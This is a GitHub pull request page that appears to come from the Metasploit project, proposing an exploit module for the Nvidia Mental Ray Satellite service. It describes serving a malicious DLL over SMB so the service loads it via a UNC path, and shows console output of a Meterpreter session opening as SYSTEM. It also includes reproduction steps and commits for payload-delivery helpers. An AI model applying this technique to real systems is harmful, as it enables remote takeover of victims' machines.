Nvidia Mental Ray Service Exploit #3079

wants to merge 19 commits into


None yet
5 participants

Meatballs1 commented Mar 8, 2014

Vulnerable Software: http://images.autodesk.com/adsk/files/Maya_mrsat3.11.1_Win_64bit.exe

Re-did this module to take advantage of the SMBFileServer mixin and help to provide some verification that it works.

This module serves a DLL over SMB. It also has to listen on a second socket to catch a connection from the Satellite which is initiated after we send the HELLO packet.

After we have sent the HELLO, and have received the client connection, we can send the command to load the DLL via an UNC path.

Example Run

msf exploit(nvidia_mental_ray) > exploit

[*] Started reverse handler on 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\\xAGZS\vzrVQhC.dll
[*] Instructed the service to load \\\xAGZS\vzrVQhC.dll...
[*]    nvidia_mental_ray - Connected to Listener
[*] Sending stage (971264 bytes) to
[*] Meterpreter session 1 opened ( -> at 2014-03-08 16:39:14 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


  • Land #3074
  • Land #3075
  • Install Mental Ray Service and reboot (or start service)
  • Fire exploit

Reproduction Steps

Steps to generate the network traffic:

Install Autodesk Maya: http://www.autodesk.com/products/autodesk-maya/free-trial
Configure as per: http://seithcg.com/wordpress/?page_id=64
Install satellite service: http://images.autodesk.com/adsk/files/Maya_mrsat3.11.1_Win_64bit.exe

Use the following command to generate some networked rendering:
"c:\Program Files\Autodesk\Maya2014\bin\Render.exe" -r mr -s 1 -e 1 -b 1 -v 5 -rnm false -x 1024 -y 435 -rp true -of tif "C:\Program Files\Autodesk\Maya2014\presets\toon\examples\CalligraphicLine.ma"

Monitor the generated traffic in Wireshark.

joevennix and others added some commits Mar 4, 2014

@joevennix joevennix Adds Safari User Assisted download launch module. 40047f0
@joevennix joevennix Tweak timeouts. 32c27f6
@joevennix joevennix Move osx-app format to EXE. cd3c2f9
@joevennix joevennix Add BES, change extra_plist -> plist_extra. 12cf5a5
@joevennix joevennix Tweaks for BES. dca807a
@joevennix joevennix Minor fixes. 38a2e6e
@joevennix joevennix Hardcode the platform in the safari exploit. 43d315a
@joevennix joevennix Adds more descriptive explanation of 10.8+ settings. 5abb442
@joevennix joevennix Allow a custom .app bundle.
* adds a method to Rex::Zip::Archive to allow recursive packing
@todb-r7 todb-r7 Allow TFTP server to take a host/port argument
Otherwise you will tend to listen on your default ipv6 'any' address and
bound to udp6 port 69, assuming you haven't bothered to disable your
automatically-enabled ipv6 stack.

This is almost never correct.
@0x41414141 0x41414141 This commit adds support for implementing the SMBFileServer Module
within Rex, allowing exploit modules to create a payload to be sent
to an SMBFileServer instance. This can be useful in cases where
you would find DLL injection in an system which will read files
over a UNC share, or other instances where a payload can be delivered
over SMB.

This code borrows heavily from the ms13_071_theme module written
by Juan Vazquez, however I have performed a fair amount of protocol
analysis and debugging to provide support for delivering an arbitrary
MSF payload over UNC.
The main differences being the presence of functions to support:
 -SMB CMD Trans Query Path Info (Basic and Standard)
 - SMB CMD Trans Query File Info (Standard and Internal)

This code can be considered "alpha", as I have only implemented support
for the SMB functions discovered during development of an exploit of an
arbitrary DLL injection into a server performing a "LoadLibraryA" call.*
However, this provides a basis upon which additional SMB functions can
be implemented to extend delivery of payloads over SMB.

A separate commit will expose the SMBFileServer Module within

* This exploit will be committed separately once a fix has been confirmed
by the vendor.
@wchen-r7 wchen-r7 Land #3065 - Safari User-Assisted Download & Run Attack c76a1ab
@todb-r7 todb-r7 Make the path options required and use /tmp
Otherwise it's impossible to run this module without setting the options
which were not otherwise validated anyway.
@todb-r7 todb-r7 Since dirs are required, server will send/recv
This does change some of the meaning of the required-ness of the
directories. Before, if you wanted to serve files, but not receive any,
you would just fail to set a OUTPUTPATH.

Now, since both are required, users are required to both send and
recieve. This seems okay, you can always just set two different
locations and point the one you don't want at /dev/null or something.
@todb-r7 todb-r7 OptPath, not OptString. 151e228
@wchen-r7 wchen-r7 Land #3077 - Allow TFTP server to take a host/port argument e32ff7c
@Meatballs1 Meatballs1 Merge remote-tracking branch 'upstream/pr/3075' into nvidia_mental_ra…
@Meatballs1 Meatballs1 Merge remote-tracking branch 'upstream/master' into nvidia_mental_ray…
@Meatballs1 Meatballs1 Nvidia Mental Ray Take #2 831d8ea

Meatballs1 closed this Jul 15, 2014

Meatballs1 reopened this Mar 5, 2015

Meatballs1 closed this Mar 5, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment